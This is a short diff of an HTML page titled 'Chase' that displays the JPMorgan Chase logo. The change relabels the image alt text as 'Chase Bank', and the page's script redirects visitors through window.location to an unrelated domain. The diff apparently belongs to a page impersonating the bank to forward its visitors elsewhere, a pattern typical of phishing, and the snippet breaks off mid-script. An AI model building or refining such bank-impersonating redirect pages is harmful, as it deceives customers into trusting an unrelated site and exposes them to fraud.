--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 	<title>Chase</title>
 </head>
 <body>
-<p><img alt="Make My Website" src="https://en.wikipedia.org/wiki/JPMorgan_Chase#/media/File:JP_Morgan_logo.jpg" style="width: 250px; height: 104px;" /><script type="text/javascript">
+<p><img alt="Chase Bank" src="https://en.wikipedia.org/wiki/JPMorgan_Chase#/media/File:JP_Morgan_logo.jpg" style="width: 250px; height: 104px;" /><script type="text/javascript">
 
 function Redirect() {
     window.location.href = "https://privatelabelgrw.com/";
